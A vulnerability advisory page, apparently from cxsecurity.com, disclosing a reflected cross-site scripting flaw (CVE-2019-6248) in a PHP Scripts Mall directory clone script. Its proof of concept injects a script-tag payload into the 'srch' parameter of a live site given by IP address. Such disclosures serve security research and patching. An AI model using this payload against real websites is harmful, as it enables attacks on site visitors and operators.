PHP Scripts Mall Citysearch / Hotfrog / Gelbeseiten Clone Script 2.0.1 Reflected XSS

2019.01.13
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

############################################################################################################ # Exploit Title: PHP Scripts Mall Citysearch / Hotfrog / Gelbeseiten Clone Script 2.0.1 Reflected XSS. # Date: 12.1.2019 # Exploit Author: Sukanta Beniya # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/citysearch-hotfrog-gelbeseiten-clone-script/ # Category: Web Application # Version: 2.0.1 # Tested on: Windows 10 # Web: https://suku90.wordpress.com # CVE: CVE-2019-6248 ########################################################################################################### *Proof of Concept* For Reflected XSS: ................... 1. First Goto XSS vulnerable Website "http://74.124.215.220/~jusdil/" 2. Find url haveing " srch= " 3. example : http://74.124.215.220/~jusdil/restaurants-details.php?fid=10&srch=Baby%20Care 4. Edit search field with XSS script " http://74.124.215.220/~jusdil/restaurants-details.php?fid=10&srch="><script>alert("SUKANTA")</script> " 5. Than Hit Enter 6. You, Will, See The XSS popup "SUKANTA" ############################################################################################################ ----------------------------------------------------------------------------------------


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top